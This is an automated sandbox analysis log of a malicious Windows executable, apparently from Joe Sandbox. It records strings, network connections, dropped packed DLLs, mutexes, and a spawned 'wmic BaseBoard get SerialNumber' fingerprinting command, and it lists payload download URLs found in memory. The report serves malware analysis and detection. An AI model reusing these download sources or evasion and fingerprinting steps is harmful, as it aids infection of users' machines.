Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQ
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415571391.00000000081FC000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415739688.0000000008368000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win32.lib.5.dr, ExuiKrnln_Win64.lib.5.drString found in binary or memory: https://iexui.com/downexui
Source: unknownNetwork traffic detected: HTTP traffic on port 57332 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57334 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57330 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57331
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57332
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57333
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57312
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57334
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57356
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57330
Source: unknownNetwork traffic detected: HTTP traffic on port 57337 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57333 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57356 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57331 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57312 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57335
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57336
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57337
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57338
Source: unknownNetwork traffic detected: HTTP traffic on port 57286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57286
Source: unknownNetwork traffic detected: HTTP traffic on port 57338 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57336 -> 443
Source: unknownHTTPS traffic detected: 113.200.1.7:443 -> 192.168.2.10:57356 version: TLS 1.2

System Summary

barindex
PE file contains section with special chars
Source: AntiCheat.dll.7.drStatic PE information: section name: .(
Source: AntiCheat.dll.7.drStatic PE information: section name: .!
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C656130 NtSetInformationThread,7_3_6C656130
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7A8C497_3_6C7A8C49
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C862CCF7_3_6C862CCF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6CCC3B7_3_6C6CCC3B
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C72ECEB7_3_6C72ECEB
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C718CC67_3_6C718CC6
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C722D2E7_3_6C722D2E
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C862D1C7_3_6C862D1C
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C862E877_3_6C862E87
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7A8E067_3_6C7A8E06
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6ACEE57_3_6C6ACEE5
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C714EEF7_3_6C714EEF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C708EB57_3_6C708EB5
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C86EF857_3_6C86EF85
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7B0FBA7_3_6C7B0FBA
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7B88557_3_6C7B8855
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C76E8D77_3_6C76E8D7
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7149587_3_6C714958
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6C49DC7_3_6C6C49DC
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7EEA157_3_6C7EEA15
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C720AD27_3_6C720AD2
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6AE4677_3_6C6AE467
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6DA4227_3_6C6DA422
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7C64967_3_6C7C6496
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7E44857_3_6C7E4485
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7405977_3_6C740597
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C80E61F7_3_6C80E61F
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7407697_3_6C740769
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7627ED7_3_6C7627ED
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C80473D7_3_6C80473D
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7E20677_3_6C7E2067
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C73006A7_3_6C73006A
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7C60DF7_3_6C7C60DF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C75E0B27_3_6C75E0B2
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7DE08E7_3_6C7DE08E
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6E01627_3_6C6E0162
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7EE1217_3_6C7EE121
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7661EF7_3_6C7661EF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C8081717_3_6C808171
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7C62657_3_6C7C6265
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7E028E7_3_6C7E028E
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6AC3767_3_6C6AC376
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6AA3CA7_3_6C6AA3CA
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6EA3C47_3_6C6EA3C4
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7B5C447_3_6C7B5C44
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C73DCD77_3_6C73DCD7
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7BFD417_3_6C7BFD41
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C80FD277_3_6C80FD27
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C801D5B7_3_6C801D5B
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C753EE87_3_6C753EE8
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C70BF7B7_3_6C70BF7B
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C717F2C7_3_6C717F2C
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7C7FC67_3_6C7C7FC6
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6AB8747_3_6C6AB874
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C71784C7_3_6C71784C
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6CB8237_3_6C6CB823
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C8518FA7_3_6C8518FA
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C82182C7_3_6C82182C
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7678947_3_6C767894
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7CD9717_3_6C7CD971
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7C99327_3_6C7C9932
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6DD9157_3_6C6DD915
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C71990D7_3_6C71990D
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7F199D7_3_6C7F199D
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7CD9977_3_6C7CD997
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7D9A477_3_6C7D9A47
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C78BAEC7_3_6C78BAEC
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C797AB67_3_6C797AB6
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C72DB5E7_3_6C72DB5E
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6C7BA17_3_6C6C7BA1
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6B5B987_3_6C6B5B98
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C72348F7_3_6C72348F
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C72F55C7_3_6C72F55C
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C8295447_3_6C829544
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6E96CA7_3_6C6E96CA
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7076827_3_6C707682
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6B17627_3_6C6B1762
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7E97F07_3_6C7E97F0
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C8257457_3_6C825745
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C81B0167_3_6C81B016
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7FB0937_3_6C7FB093
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C81B2147_3_6C81B214
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C8293A17_3_6C8293A1
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7BB3447_3_6C7BB344
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6A333C7_3_6C6A333C
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C7833D97_3_6C7833D9
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_100103A014_2_100103A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_1007D60014_2_1007D600
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_1004578014_2_10045780
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_1008193014_2_10081930
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10095FA014_2_10095FA0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_100C00E014_2_100C00E0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_100B820014_2_100B8200
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_3_0C67A2A715_3_0C67A2A7
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_1007D60015_2_1007D600
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_1004578015_2_10045780
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_1008193015_2_10081930
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10095FA015_2_10095FA0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_100C00E015_2_100C00E0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_100B820015_2_100B8200
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_100103A015_2_100103A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_1001440E15_2_1001440E
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dll 1845DF41DA539BCA264F59365BF7453B686B9098CC94CD0E2B9A20C74A561096
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\download\atl71.dll A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: String function: 100261B0 appears 239 times
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: String function: 004174A6 appears 106 times
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: String function: 10013220 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: String function: 10025930 appears 370 times
Source: api-ms-win-crt-heap-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.7.drStatic PE information: No import functions for PE file found
Source: VZ7xFmeuPX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: xldl.dll.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.9888613861386139
Source: msvcr71.dll.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.9887627495659722
Source: classification engineClassification label: mal100.evad.winEXE@10/37@45/15
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10049AB0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetModuleHandleA,GetProcAddress,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,GetVolumeInformationA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CreateFileA,SetFilePointer,SetEndOfFile,CloseHandle,GetLastError,SetEndOfFile,CloseHandle,CloseHandle,Sleep,14_2_10049AB0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10049AB0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetModuleHandleA,GetProcAddress,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,GetVolumeInformationA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CreateFileA,SetFilePointer,SetEndOfFile,SetFileValidData,CloseHandle,GetLastError,SetEndOfFile,CloseHandle,CloseHandle,Sleep,15_2_10049AB0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_1001D704 __EH_prolog,InterlockedIncrement,InterlockedDecrement,RtlLeaveCriticalSection,CoInitializeEx,CoCreateInstance,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,RtlLeaveCriticalSection,GetTickCount,RtlLeaveCriticalSection,GetModuleHandleW,??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z,GetModuleFileNameW,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ,RtlLeaveCriticalSection,WaitForSingleObject,14_2_1001D704
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_100213BF lstrlenW,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,memcpy,FreeLibrary,14_2_100213BF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Program Files (x86)\SkinsJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeFile created: C:\Users\user\Desktop\ExuiKrnln_Win32.libJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeMutant created: \Sessions\1\BaseNamedObjects\F8730FC7_1436_4121_9FA6_C0FBF4817482
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMutant created: \Sessions\1\BaseNamedObjects\c:/users/user/appdata/local/temp/download/minithunderplatform.exe_mini_tp_connector_tpka_m_2013515_360_a
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeMutant created: \Sessions\1\BaseNamedObjects\c:/users/user/appdata/local/temp/download/minithunderplatform.exe_mini_tpka_m_2013515_360_a
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: VZ7xFmeuPX.exeReversingLabs: Detection: 79%
Source: MiniThunderPlatform.exeString found in binary or memory: -StartTP
Source: MiniThunderPlatform.exeString found in binary or memory: id-cmc-addExtensions
Source: MiniThunderPlatform.exeString found in binary or memory: set-addPolicy
Source: MiniThunderPlatform.exeString found in binary or memory: -StartTP
Source: MiniThunderPlatform.exeString found in binary or memory: id-cmc-addExtensions
Source: MiniThunderPlatform.exeString found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeFile read: C:\Users\user\Desktop\VZ7xFmeuPX.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\VZ7xFmeuPX.exe "C:\Users\user\Desktop\VZ7xFmeuPX.exe"
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeProcess created: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumber
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
